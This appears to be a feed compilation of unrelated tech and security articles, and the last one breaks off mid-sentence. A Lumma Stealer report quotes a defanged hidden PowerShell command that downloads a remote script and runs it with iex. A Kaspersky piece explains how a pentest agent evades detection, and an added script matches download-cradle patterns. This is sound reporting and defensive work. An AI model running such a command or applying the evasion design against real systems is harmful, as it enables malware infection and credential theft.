DK 9x28 - The Garante and the Prophet of Quèlo
The Garante launches a public consultation to be told what it should answer to the very questions it was created to answer.
spreaker.com/episode/dk-9x28-i…
Studying QR Code Degradation
It’s fair to say that QR codes are a technology that has finally come of age. A decade or more ago they were a little over-hyped and sometimes used in inappropriate or pointless ways, but now they are an accepted and useful part of life.
They’re not without their faults though, one of which is that despite four increasingly redundant levels of error correction, there comes a point at which a degraded QR code can no longer be read. [HumanQR] is soliciting these broken QR codes for research purposes and inclusion in an eventual open-source database, and they’ll even have a shot at repairing your submissions for you.
It’s a problem inherent to all digital media: once the limit of whatever error correction they contain has been reached, they arrive at a cliff-edge at which they go immediately from readability to non-readability. The example given in the linked article is a locator tag on a stray cat, which had been partly rubbed away. Improving its contrast, sharply defining its edges, and improving the definition of its fiducials was enough to revive it, we hope leading to the cat being returned home.
The idea is that by studying enough damaged codes it should be possible to identify the means by which they become degraded, and perhaps come up with a way to inform some repair software. Meanwhile if you are interested, you might want to learn more about how they work, the hard way.
Digital sovereignty. What it is and what the main threats to the national cyberspace are.
“In a global and open cyberspace, full digital sovereignty implies a nation’s overall authority over the data generated by its citizens, its public administration and its businesses. This includes the nation’s capacity to employ secure technologies to process this data, supported by a sufficient, competent and trusted workforce. It also entails establishing and actively maintaining dynamic, targeted international collaborations to proactively address threats. Finally, it requires a society that is fully aware of, and educated about, the risks present in cyberspace.” In these few lines Professor Roberto Baldoni summarised his idea of technological sovereignty, set out in his book of the same name published by il Mulino (2025), Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.
The essay, an updated and condensed version of an earlier English-language text by the same author, Charting digital sovereignty. A survival playbook (Amazon, 2024), concisely describes the four areas that put digital sovereignty at risk, understood as self-government of data, technologies, infrastructure and people, namely: a) cyber attacks; b) threats to the supply chain of critical supplies; c) the spread of emerging technologies such as artificial intelligence and quantum computing; d) social, industrial, technological and hybrid threats.
Baldoni analyses the four areas drawing also on examples from the news; the chapters are rich in detail on how insider threats, hackers and APTs operate, illustrate DDoS and ransomware attacks, and illustrate supply chain risks with reference to the SolarWinds and Kaseya cases, the rise of chatbots and predictive algorithms, up to the disinformation built into social networks, citing the well-known cases of Brexit, Pizzagate and the change of ownership of Twitter, now X.
Roberto Baldoni, a veteran of the field, for twenty years professor of Distributed Systems at the Faculty of Engineering of Sapienza University of Rome, architect of the Agenzia per la cybersicurezza nazionale (the Italian National Cybersecurity Agency) and its first director from 2021 to 2023, is nevertheless careful to make clear that digital sovereignty is a moving concept that scholars themselves have not yet defined unambiguously and that nation states interpret differently. He nonetheless insists on an operational definition: a nation’s ability to protect its cyberspace as if it were protecting a physical territory, the failure of which amounts to handing its inhabitants over to an obscure and uncontrollable power, that of a form of progress in which malicious actors exploit machines that outstrip humans and bypass all the checks and balances of democracy.
Using a Mythic agent to optimize penetration testing
Introduction
The way threat actors use post-exploitation frameworks in their attacks is a topic we frequently discuss. It’s not just about analysis of artifacts for us, though. Our company’s deep expertise means we can study these tools to implement best practices in penetration testing. This helps organizations stay one step ahead.
Being experts in systems security assessment and information security in general, we understand that a proactive approach always works better than simply responding to incidents that have already occurred. And when we say “proactive”, we imply learning new technologies and techniques that threat actors may adopt next. That is why we follow the latest research, analyze new tools, and advance our pentesting expertise.
This report describes how our pentesters are using a Mythic framework agent. The text is written for educational purposes only and intended as an aid for security professionals who are conducting penetration testing with the system owner’s consent.
It’s worth noting that Kaspersky experts assign a high priority to the detection of the tools and techniques described in this article as well as many similar others employed by threat actors in real-world attacks.
These efforts to counter malicious actors use solutions like Kaspersky Endpoint Security that utilize the technologies listed below.
- Behavioral analysis tracks processes running in the operating system and detects malicious activity, providing added security for critical OS components such as the Local Security Authority Subsystem Service process.
- Exploit prevention stops threat actors from taking advantage of vulnerabilities in installed software and the OS itself.
- Fileless threats protection detects and blocks threats that, instead of residing in the file system as traditional files, exist as scheduled tasks, WMI subscriptions, and so on.
- There are many others too.
However, it’s worth noting that since our study discusses a sophisticated attack controlled directly by a malicious actor (or a pentester), more robust defense calls for a layered approach to security. This must incorporate security tools to help SOC experts quickly detect malicious activity and respond in real time.
These include Endpoint Detection and Response, Network Detection and Response and Extended Detection and Response solutions as well as Managed Detection and Response services. They provide continuous monitoring and response to potential incidents. Usage of threat intelligence to acquire up-to-date and relevant information about attacker tactics and techniques is another cornerstone of comprehensive defense against sophisticated threats and targeted attacks.
This study is the product of our exploration and analysis: how we as defenders can best prepare and what we should expect. What follows is part one of the report in which we compare pentesting tools and choose the option that suits the objectives of our study. Part two deals with how to communicate with the chosen framework and achieve our objectives.
Pentester tools: how to choose
An overview of ready-made solutions
Selecting pentesting tools can prove a challenging task. Few pentesters can avoid detection by EPP or EDR solutions. As soon as a pentesting tool gains popularity among attackers, defensive technologies begin detecting not only its behavior, but also its individual components. Besides, the ability to detect the tool becomes a key performance indicator for these technologies. As a result, pentesters have to spend more time preparing for a project.
At the same time, many existing solutions have flaws that impede pentesting. Ethical hackers, for example, frequently use Cobalt Strike. The Beacon agent uses a specific opcode sequence in platform version 4.9.1. To avoid detection by security solutions, opcodes must be changed, but that breaks the agent.
Immutable opcode sequence for Cobalt Strike agent
Another example is Metasploit’s Meterpreter payload, whose signatures appear in Microsoft’s antivirus database more than 230 times, making the tool significantly more difficult to use in projects.
The Sliver framework is an open-source project. It is in active development, and it can handle pentesting tasks. However, this project has a number of drawbacks, too.
- The size of a payload generated by the framework is 8–9 megabytes. This reduces flexibility because the ideal size of a pentesting agent that ensures versatility is about 100 KB.
- Stability issues. We’ve seen active sessions drop. The framework once lacked support for automatically using a proxy server from the Windows configuration, which also complicated its use. This has since been addressed.
The Havoc framework and its Demon payload are currently gaining popularity: both are evolving, and both support evasion techniques. However, the framework currently suffers from a lack of compliance with operational security (OPSEC) principles and stability issues. Additionally, payload customization in Havoc is limited by rigid parameters.
As you can see, we cannot fully rely on open-source projects for pentesting due to their significant shortcomings. On the other hand, creating tools from scratch would require extra resources, which is inefficient. So, it’s crucial to strike the right balance between building in-house solutions and leveraging open-source projects.
Payload structure
First, let’s define what kind of payload is required for pentesting. We decided to split it into three modules: Stage 0, Stage 1 and Stage 2. The first module, Stage 0, creates and runs the payload. It must generate an artifact, such as a shellcode, a DLL or EXE file, or a VBA script, and provide maximum flexibility by offering customizable parameters for running the payload. This module also handles the circumvention of security measures and monitors the runtime environment.
The second module (Stage 1) must allow the operator to examine the host, perform initial reconnaissance, and then use that information to establish persistence via a payload maintaining covert communications. After successfully establishing persistence, this module must launch the third module (Stage 2) to perform further activities such as lateral movement, privilege escalation, data exfiltration, and credential harvesting.
The Stage 0 module has to be written from scratch, as available tools quickly get detected by security systems and become useless for penetration testing. To implement the Stage 1 module, we settled on a hybrid approach: partially modifying existing open-source projects while implementing some features in-house. For the third module (Stage 2), we also used open-source projects with minor modifications.
This article describes the implementation of the second module (Stage 1) in detail.
Formulating requirements
In light of the objectives outlined above, we will formulate the requirements for the Stage 1 module.
- Dynamic functionality, or modularity, for increased resilience. In addition, dynamic configuration allows adding techniques via new modules without changing the functional core.
- Ensuring that the third payload module (Stage 2) runs.
- Minimal size (100–200 KB) and minimal traces left in the system.
- The module must comply with OPSEC principles and allow operations to run undetected by security controls. This means we must provide a mechanism for evading signature-based memory scanning.
- Employing non-standard (hidden) communication channels, outside of HTTP and TCP, to establish covert persistence and avoid network detection.
Choosing the best solution
While defining the requirements, we recognized the need for a modular design. To begin, we need to determine the best way to add new features while running the tasks. One widely used method for dynamically adding functionality is reflective DLL injection, introduced in 2008. This type of injection has both its upsides and downsides. The ReflectiveLoader function is fairly easy to detect, so we’d need a custom implementation for a dynamic configuration. This is an effective yet costly way of achieving modularity, so we decided to keep looking.
The PowerShell Empire framework, whose loader is based on reflective PowerShell execution, gained popularity in the mid-2010s. The introduction of strict monitoring and rigid policies surrounding PowerShell marked the end of its era, with .NET assemblies, executed reflectively using the Assembly.Load method, gaining popularity. Around this time, toolkits like SharpSploit and GhostPack emerged. Cobalt Strike’s execute-assembly feature, introduced in 2018, allowed for .NET assembly injection into a newly created process. Process creation followed by injection is a strong indicator of compromise and is subject to rigorous monitoring. Injecting code requires considerable planning and tailored resources, plus it’s easily detectable. It’s best used after you’ve already performed initial reconnaissance and established persistence.
The next stage of framework evolution is the execution of object files in memory. An object file (COFF, Common Object File Format) is a file that represents a compiled version of the source code. Object files are typically not full-fledged programs: they are needed to link and build a project. An object file includes several important elements ensuring that the executable code functions correctly.
- Header contains information about the architecture, timestamp, number of sections and symbols, and other metadata.
- Sections are blocks that may include assembly code, debugging information, linker directives, exception information, and static data.
- Symbol table contains functions and variables, and information about their location in memory.
Using object files allows you to avoid loading a CLR environment into the process, such as when using a .NET assembly and the Assembly.Load method.
Moreover, COFF is executed in the current context, without the need to create a process and inject the code into it. The feature was introduced and popularized in 2020 by the developers of the Cobalt Strike framework. And in 2021, TrustedSec developed the open-source COFF Loader that serves the same purpose: the tool loads a COFF file from disk and runs it. This functionality perfectly aligns with our objectives because it enables us to perform the required actions: surveying, gaining persistence within the system and initiating the next module via an object file – if we incorporate network retrieval and in-memory execution of the file in the project. In addition, when using COFF Loader, the pentester can remain undetected in the system for a long time.
To interact with the agent in this study, we decided to use BOFs (Beacon Object Files) designed for Cobalt Strike Beacon. The internet offers a wide variety of open-source tools and functions created for BOFs. By using different BOFs as separate modules, we can easily add new techniques at any time without modifying the agent’s core.
Another key requirement for Stage 1 is a minimal payload size. Several approaches can achieve this: for instance, using C# can result in a Stage 1 size of around 20 KB. This is quite good, but the payload will then have a dependency on the .NET framework. If we use a native language like C, the unencrypted payload will be approximately 50 KB, which fits our needs.
Our payload requirements are supported by the Mythic framework. Its microservice architecture makes it easy to add arbitrary server-side functionality. For example, the module assembly process takes place inside a container and is fully defined by us. This allows us to replace specific strings with arbitrary values if detected. Furthermore, Mythic supports both standard communication protocols (HTTPS, TCP) and covert channels, such as encrypted communication over Slack or Telegram. Finally, the use of C ensures a small payload size. All of these factors make the Mythic framework and the agent interacting with it to execute BOFs an optimal choice for launching the second module.
Communication model
In the communication process between the agent and the framework, we need to focus on three elements: payload containers, C2 profile containers, and the translation container. Payload containers hold the agent’s source code and are responsible for building the payload. C2 profile containers are responsible for communicating with the agent. They must receive traffic from the agent and send it to Mythic for further processing. The translation container handles the encryption and decryption of network traffic. We’ll be using HTTP when interacting with Mythic, so the C2 profile will be a web server listening on ports 80 and 443.
Communication flow between the agent and the Mythic framework
Loading an object file
To load and execute an object file, the agent must read the .text section and replace all zeros with relative addresses of external functions and static data. This is known as symbol relocation, which addresses references within a particular section of the object file. Furthermore, the agent places these symbols in memory, for example, after the code section.
To find external functions, we’ll have to analyze the libraries specified in the linker directives of the object file. To do this, we used the functions LoadLibrary, GetModuleHandle and GetProcAddress.
The diagram below clarifies how an object file is loaded and memory is allocated for its components.
Object file representation on disk (left) and in memory (right)
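The header, section and symbol-table layout listed earlier and the relocation step described just above, as an added example that is not part of Kaspersky’s article, of Mythic or of TrustedSec’s COFF Loader: a small Python parser that reads a COFF object, lists the undefined symbols each section’s relocations reference (the imports a loader must resolve with LoadLibrary/GetProcAddress, and therefore what a BOF will call at runtime), and computes the 32-bit displacement a loader writes for an x64 REL32 relocation. The object bytes are constructed inline in BOF shape; the `__imp_MODULE$Function` import names follow the BOF convention, and the timestamp and section contents are made up.

```python
import struct
from dataclasses import dataclass

# Fixed-size COFF records (little-endian); field order follows the PE/COFF specification.
COFF_HEADER = struct.Struct("<HHIIIHH")         # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
RELOCATION = struct.Struct("<IIH")              # VirtualAddress (offset in section), SymbolTableIndex, Type
SYMBOL = struct.Struct("<8sIhHBB")              # Name, Value, SectionNumber, Type, StorageClass, NumberOfAuxSymbols
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_REL_AMD64_REL32 = 0x0004                  # 32-bit RIP-relative displacement, as used by call [rip+disp32]

@dataclass
class Section:
    name: str
    size: int
    relocations: list  # (offset_in_section, symbol_index, type)

@dataclass
class Symbol:
    name: str
    value: int
    section_number: int  # 0 = undefined: the loader must resolve it before the code can run

def _symbol_name(raw: bytes, strtab: bytes) -> str:
    # Names longer than 8 bytes live in the string table; the record then holds 4 zero bytes and an offset.
    if raw[:4] == b"\0\0\0\0":
        off = struct.unpack_from("<I", raw, 4)[0]
        return strtab[off:strtab.index(b"\0", off)].decode()
    return raw.rstrip(b"\0").decode()

def parse_coff(data: bytes) -> dict:
    machine, nsec, ts, symoff, nsym, optsize, _ = COFF_HEADER.unpack_from(data, 0)
    strtab = data[symoff + nsym * SYMBOL.size:]  # the string table directly follows the symbol table
    symbols, i = [], 0
    while i < nsym:
        raw, value, secnum, _, _, naux = SYMBOL.unpack_from(data, symoff + i * SYMBOL.size)
        symbols.append(Symbol(_symbol_name(raw, strtab), value, secnum))
        symbols.extend([None] * naux)  # auxiliary records occupy symbol-table indices too
        i += 1 + naux
    sections = []
    for s in range(nsec):
        name, _, _, rawsize, _, reloff, _, nrel, _, _ = SECTION_HEADER.unpack_from(data, COFF_HEADER.size + optsize + s * SECTION_HEADER.size)
        relocs = [RELOCATION.unpack_from(data, reloff + r * RELOCATION.size) for r in range(nrel)]
        sections.append(Section(name.rstrip(b"\0").decode(), rawsize, relocs))
    return {"machine": machine, "timestamp": ts, "sections": sections, "symbols": symbols}

def external_references(obj: dict) -> dict:
    """Per section, the undefined symbols its relocations point at: the 'zeros' a loader has to fill in."""
    refs = {}
    for sec in obj["sections"]:
        names = []
        for _, sym_index, _ in sec.relocations:
            sym = obj["symbols"][sym_index]
            if sym is not None and sym.section_number == 0 and sym.name not in names:
                names.append(sym.name)
        refs[sec.name] = names
    return refs

def split_import(name: str):
    """Decode the BOF import convention __imp_MODULE$Function; Beacon API imports carry no module part."""
    if not name.startswith("__imp_"):
        return None
    module, sep, func = name[len("__imp_"):].partition("$")
    return (module, func) if sep else ("beacon", module)

def rel32_displacement(section_base: int, reloc_offset: int, target: int) -> int:
    """Value written into a REL32 field: target minus the address of the byte after the 4-byte field.
    For __imp_ symbols the target is the pointer slot the loader places after the code section."""
    disp = target - (section_base + reloc_offset + 4)
    if not -0x80000000 <= disp < 0x80000000:
        raise ValueError("target not reachable with a 32-bit displacement")
    return disp & 0xFFFFFFFF

def build_sample_object() -> bytes:
    """Constructed minimal x64 object in BOF shape (not a real BOF): one .text section with two
    call [rip+disp32] instructions whose displacement fields are relocated against undefined imports."""
    code = bytes.fromhex("4883ec28" "ff1500000000" "ff1500000000" "4883c428" "c3")
    names = [b"go", b"__imp_KERNEL32$GetComputerNameA", b"__imp_BeaconPrintf"]
    strtab_body = b"".join(n + b"\0" for n in names[1:])
    strtab = struct.pack("<I", 4 + len(strtab_body)) + strtab_body
    code_off = COFF_HEADER.size + SECTION_HEADER.size
    reloc_off = code_off + len(code)
    relocs = RELOCATION.pack(6, 1, IMAGE_REL_AMD64_REL32) + RELOCATION.pack(12, 2, IMAGE_REL_AMD64_REL32)
    sym_off = reloc_off + len(relocs)
    long_name = lambda off: b"\0\0\0\0" + struct.pack("<I", off)
    symtab = (SYMBOL.pack(b"go", 0, 1, 0x20, 2, 0)                                 # defined in section 1
              + SYMBOL.pack(long_name(4), 0, 0, 0x20, 2, 0)                        # undefined, external
              + SYMBOL.pack(long_name(4 + len(names[1]) + 1), 0, 0, 0x20, 2, 0))  # undefined, external
    header = COFF_HEADER.pack(IMAGE_FILE_MACHINE_AMD64, 1, 0x65F00000, sym_off, 3, 0, 0)  # made-up timestamp
    section = SECTION_HEADER.pack(b".text", 0, 0, len(code), code_off, reloc_off, 0, 2, 0, 0x60500020)
    return header + section + code + relocs + symtab + strtab
```

Run against a real object file, `external_references` gives a defender the list of Win32 and Beacon API calls a BOF will make without executing it.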
The downsides of the solution
The method described above has a number of shortcomings. Because object file execution is blocking, multiple tasks cannot run simultaneously. For long-term tasks, other methods such as process injection are necessary; however, this is not a critical flaw for the second module, as it is not intended for long-running tasks.
Several other shortcomings are difficult to mitigate. For example, since the object file is executed in the current thread, a critical error will terminate the process. Furthermore, during the execution of the object file in memory, the VirtualAlloc function is used for section mapping and relocation. A call to this WinAPI might alert the security system.
Implementing additional functionality during development and compilation can help complicate analysis and detection for more efficient pentesting and a longer agent life cycle.
Conclusion
Mythic’s features make it a convenient pentesting tool that covers the bulk of pentesting objectives. To utilize this framework efficiently, we created an agent that extends ready-made solutions with our own code. This configuration gave us suitable flexibility and enhanced protection against detection, which is most of what a pentester asks of a working tool.
Simulating High-Side Bootstrap Circuits With LTSpice
LTSpice is a tool that every electronics nerd should have at least a basic knowledge of. Those of us who work professionally in the analog and power worlds rely heavily on the validity of our simulations. It’s one of the basic skills taught at college, and essential to truly understand how a circuit behaves. [Mano] has quite a collection of videos about the tool, and here is a great video explanation of how a bootstrap circuit works, enabling a high-side driver to work in the context of driving a simple buck converter. However, before understanding what a bootstrap is, we need to talk a little theory.
Bootstrap circuits are very common when NMOS (or NPN) devices are used on the high side of a switching circuit, such as a half-bridge (and by extension, a full bridge) used to drive a motor or pump current into a power supply.
A simple half-bridge illustrates the high-side NMOS driving problem.
From a simplistic viewpoint, due to the apparent symmetry, you’d want to have an NMOS device at the bottom and expect a PMOS device to be at the top. However, PMOS and PNP devices are weaker, rarer and more expensive than NMOS, which is all down to the device physics; simply put, the hole mobility in silicon and most other semiconductors is much lower than the electron mobility, which results in much less current. Hence, NMOS and NPN are predominant in power circuits.
As some will be aware, to drive a high-side switching transistor, such as an NPN bipolar or an NMOS device, the source end will not be at ground, but will be tied to the switching node, which for a power supply is the output voltage. You need a way to drive the gate voltage in excess of the source or emitter end by at least the threshold voltage. This is necessary to get the device to fully turn on, to give the lowest resistance, and to cause the least power dissipation. But how do you get from the logic-level PWM control waveform to what the gate needs to switch correctly?
The answer is to use a so-called bootstrap capacitor. The idea is simple enough: during one half of the driving waveform, the capacitor is charged to some fixed voltage with respect to ground, since one end of the capacitor is grounded periodically. On the other half cycle, the previously grounded end jumps up to the output voltage (the source end of the high-side transistor), which boosts the other side of the capacitor above the source (because it was already charged), providing a temporary floating supply that can be used to drive the high-side gate and reliably switch on the transistor. [Mano] explains it much better in a practical scenario in the video below, but now you have the why and how of the technique.
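The charge-then-boost sequence just described, as an added example that is not from [Mano]’s video or from LTSpice: a cycle-by-cycle Python model of the bootstrap capacitor, plus the sizing rule that falls out of it. All component values used in the comments and tests (12 V driver supply, 0.7 V diode drop, 100 nF capacitor, 30 nC gate charge, 200 µA leakage, 48 V switch node, 8 V minimum gate drive) are constructed, not taken from the page.

```python
def bootstrap_cycles(v_cc, v_diode, c_boot, q_gate, i_leak, t_on, v_sw_high, v_gs_min, cycles=3):
    """Simplified cycle-by-cycle model of a bootstrap capacitor. Each PWM cycle the low side conducts
    first, pulling the switch node to 0 V so the capacitor charges through the diode to V_CC - V_diode;
    then the switch node jumps to v_sw_high, the capacitor's top end rides above it, and the gate driver
    draws Q_gate plus leakage for t_on out of the capacitor. Returns one record per cycle."""
    v_cap = 0.0  # starts empty: before the first low-side interval there is nothing to drive the high side with
    records = []
    for n in range(cycles):
        # low-side on: one end of the capacitor is grounded, the diode forward-biases and refreshes it
        v_cap = max(v_cap, v_cc - v_diode)
        # high-side on: the grounded end jumps to the switch node, so the other end sits at v_sw_high + v_cap
        v_top_start = v_sw_high + v_cap
        v_cap -= q_gate / c_boot           # charge moved into the MOSFET gate at turn-on
        v_cap -= i_leak * t_on / c_boot    # driver quiescent current and leakage over the on-time
        # gate-to-source voltage is the capacitor voltage; it must stay above the drive the MOSFET needs
        records.append({"cycle": n, "v_top_start": v_top_start, "v_gs_end": v_cap, "ok": v_cap >= v_gs_min})
    return records


def min_bootstrap_capacitor(v_cc, v_diode, v_gs_min, q_gate, i_leak, t_on):
    """Smallest capacitor that still leaves v_gs_min at the end of the on-time: total charge drawn per
    cycle divided by the droop the design can tolerate (V_CC - V_diode - V_gs_min)."""
    droop_allowed = v_cc - v_diode - v_gs_min
    if droop_allowed <= 0:
        raise ValueError("supply minus diode drop is already below the required gate drive")
    return (q_gate + i_leak * t_on) / droop_allowed


if __name__ == "__main__":
    # constructed values: 12 V supply, 0.7 V diode, 100 nF, 30 nC gate, 200 uA leakage, 10 us on-time, 48 V rail
    for rec in bootstrap_cycles(12.0, 0.7, 100e-9, 30e-9, 200e-6, 10e-6, 48.0, 8.0):
        print(rec)
    print("minimum C_boot:", min_bootstrap_capacitor(12.0, 0.7, 8.0, 30e-9, 200e-6, 10e-6))
```

Stretching the on-time to 2 ms in the same model drops the gate drive to 7 V, which is the droop problem that limits maximum duty cycle in bootstrapped drivers.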
We see videos about LTSpice quite a bit, like this excellent YouTube resource by [FesZ] for starters.
Lumma Stealer is back! The malware that steals everything evolves and becomes invisible
Lumma Stealer is a well-known information-stealing malware, active since mid-2022. In recent months it has shown a significant evolution in its operating methods, adopting new tactics, techniques and procedures. This threat is increasingly present in cybersecurity incident reports: in the last year alone, thousands of compromises attributed to the malware have been recorded.
It is believed to originate in the Russian cybercriminal ecosystem and is currently distributed as Malware-as-a-Service (MaaS). Its creators offer frequent updates and support to users through Telegram channels and documentation hosted on Gitbook. Lumma Stealer’s main goal is the exfiltration of sensitive data, such as login credentials, session tokens, cryptocurrency wallets and personal information collected from infected devices.
What makes Lumma particularly dangerous are its sophisticated distribution techniques, which have recently expanded to include social engineering through fake CAPTCHA prompts and deceptive download requests. These methods exploit users’ trust in familiar security verification processes, inducing victims to run malicious commands on their own systems.
Sophos researchers identified several Lumma Stealer campaigns during autumn and winter 2024-25, documenting how the malware’s tactics evolved to evade detection. “The variations we observed in Lumma Stealer’s behaviour are significant for defenders,” the Sophos Managed Detection and Response team noted in its report, stressing that these distribution techniques could easily be adapted to malware other than Lumma Stealer.
A particularly worrying innovation concerns the abuse of Windows PowerShell through deceptive CAPTCHA verification pages.
A familiar-looking verification checkbox (Source: Sophos)
In this attack chain, victims visiting malicious sites are presented with a standard “I am not a robot” verification request, creating a false sense of security and legitimacy. After clicking the verification checkbox, users are redirected to a second page that asks them to open the Windows “Run” dialog, then press Ctrl+V followed by Enter.
The subsequent “security check” request is a little unusual, but simple enough for unwary users (Source: Sophos)
This seemingly harmless action actually pastes and executes a concealed PowerShell command that runs in a hidden window:
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t
Running this command starts a sophisticated multi-stage attack process. The script retrieves additional malware components from the command-and-control servers, downloading, extracting and executing the main Lumma Stealer payload. Once active, the malware systematically accesses browser data, as shown in Figure 6, where AutoIt3.exe accesses Chrome’s login data and cookies.
Attack flow with CAPTCHA abuse (Source: Sophos)
What makes this attack vector particularly effective is the use of AES encryption to hide the subsequent payloads. The malware employs sophisticated obfuscation techniques, including the use of initialisation vectors and complex decryption routines, to evade traditional security measures. This combination of social engineering and advanced technical methods represents a significant evolution in Lumma Stealer’s capabilities.
Security experts recommend deploying robust endpoint protection solutions with behavioural analysis capabilities, since signature-based detection alone proves inadequate against these constantly evolving threats.
The article Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile comes from il blog della sicurezza informatica.
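A behavioural check for the paste-into-Run chain described above, as an added example that is not from the Sophos report or the blog post: it classifies process-creation events by the traits that command has (hidden window, download cradle, in-memory execution of the downloaded text, explorer.exe as parent, which is what the Run dialog produces) and flags only the combination. The three events are constructed, not real telemetry, and the URL in the first one is a placeholder, not the defanged address quoted in the post.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # process that spawned the shell
    image: str          # executable that was started
    command_line: str


# Constructed sample events (not Sophos telemetry). The first mirrors the shape of the command quoted
# above with a placeholder URL; the other two are ordinary administrative PowerShell launches.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe",
                 r'''"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://cdn.example.invalid/new-artist.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t'''),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe",
                 r"PowerShell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe",
                 r"PowerShell.exe -NoExit -Command Get-Process | Sort-Object CPU"),
]

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile", re.I)
EXECUTE_STRING = re.compile(r"\biex\b|invoke-expression", re.I)
SHELL_PARENT = re.compile(r"\\explorer\.exe$", re.I)  # the Run dialog launches children of explorer.exe


def classify(event: ProcessEvent) -> list:
    """Return the suspicious traits an event carries; empty for anything that is not PowerShell."""
    if not event.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    traits = []
    if HIDDEN_WINDOW.search(event.command_line):
        traits.append("hidden-window")
    if DOWNLOAD_CRADLE.search(event.command_line):
        traits.append("download-cradle")
    if EXECUTE_STRING.search(event.command_line):
        traits.append("execute-downloaded-text")
    if SHELL_PARENT.search(event.parent_image):
        traits.append("launched-from-explorer")
    return traits


def is_fake_captcha_chain(event: ProcessEvent) -> bool:
    """Download-and-execute is the core of the chain; a hidden window or an interactive explorer.exe
    parent confirms the pasted-into-Run pattern. Requiring both cradle and iex keeps plain downloads out."""
    traits = set(classify(event))
    core = {"download-cradle", "execute-downloaded-text"} <= traits
    context = bool(traits & {"hidden-window", "launched-from-explorer"})
    return core and context


def flagged_events(events) -> list:
    return [e for e in events if is_fake_captcha_chain(e)]


if __name__ == "__main__":
    for e in flagged_events(SAMPLE_EVENTS):
        print("ALERT", classify(e), e.command_line[:80])
```

The same traits are visible in Sysmon event 1 or EDR process telemetry, where command line and parent image are standard fields.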
RHC Conference 2025: 2 days of cybersecurity with panels, workshops and a Capture The Flag
On Saturday 9 May, at the Teatro Italia in Rome, the Red Hot Cyber Conference 2025 came to a close: the free annual event created by the RHC community, dedicated to cybersecurity and emerging digital technologies, but above all to young people, more numerous and more passionate at every edition, and to awareness of risk.
Massimiliano Brolli, founder of Red Hot Cyber, has put a great deal of effort into creating this event and the community, to promote an ethical vision in a digital world.
As the RHC manifesto states, “from the ashes of cyberpunk and of the old hacker groups of the past that never gave up fighting for a digitally more honest and fair world, this frontier movement wants to be a voice outside the chorus in building change from the bottom up, seeking to promote the culture of interdisciplinary hacking, thereby allowing Italy to incubate new talents who in the future will be able to make us protagonists on the international scene once again.”
The panel’s protagonists: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri and Giuseppe Corasaniti
The panel featured important institutional figures, including the valuable contribution of Ivano Gabrielli, Director of the Polizia Postale, who took part as head of the Servizio Polizia Postale e delle Comunicazioni, with long experience in countering cybercrime and protecting critical infrastructure; Luigi Montuori, Director of the Health and Research Department at the Garante per la protezione dei dati personali; the ever-present Paolo Galdieri, criminal lawyer admitted to the Court of Cassation and university lecturer in Computer Criminal Law; and Giuseppe Corasaniti, former magistrate and now Professor of Legal Informatics and Digital Ethics at Università Mercatorum. Their exclusive interviews, together with those of Luca Piccinelli, CISO of Huawei Italia, Gabriele Faggioli of Clusit and Flavia Rizza on cyberbullying, will soon be available on the Red Hot Cyber YouTube channel.
One video per day of the event will also be published, following the conference programme, together with the photo gallery of a conference that confirms itself as a reference point for Italian cybersecurity and a catalyst for the new generations.
With them we explored topics such as Italy’s situation at this moment in history, the dark side of AI, cyber resilience and cyber deterrence, the transition to the cloud, the new emerging roles with strong technical skills in digital investigations, spyware, APT attacks on telecommunications and also on 5G networks, NIS2, the invisible boundary between cybercrime and cyber terrorism as seen by a former magistrate, and much more!
Red Hot Cyber 2025: the talks and the workshops
But the stage of the Teatro Italia also hosted other leading figures of the cybersecurity scene, such as Aldo Di Mattia, Director SSE and Cybersecurity Advisor Italy & Malta, who spoke about the unequal contest between critical infrastructure and cybercriminals; Sunil Venazini, Principal Sales Engineer, who showed strategies and tools in the AI era between attackers and defenders; and the legendary Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, who brought “La scomoda eredità della filosofia Hippie” to the stage. Not only that: Donato Onofri, Senior Red Team Engineer at CrowdStrike, spoke to the audience about “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”; Michele Mezza, journalist and lecturer at the Federico II University of Naples and author of Net War, whose talk addressed “information as the language of hybrid warfare”; followed by ‘our own’ Stefano Gazzella, journalist and Data Protection Officer, with “Cani da Guardia 4.0, Informazione e Divulgazione Cyber”, and Pietro Melillo, CISO of Wuerth Italia, with “Un anno di DarkLab tra Intelligence a Threat Actors”; and last but not least Agostino Pellegrino, Cyber Security Expert, who with his talk “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” showed us how a Wi-Fi network can be hacked; Roberto Camerinesi, ethical hacker and CTO of Cyber Evolution, who brought the new frontiers of satellite hacking to the audience with “Houston, abbiamo un problema”; and finally the brilliant and entertaining Antonio Montillo, ethical hacker and security researcher, with 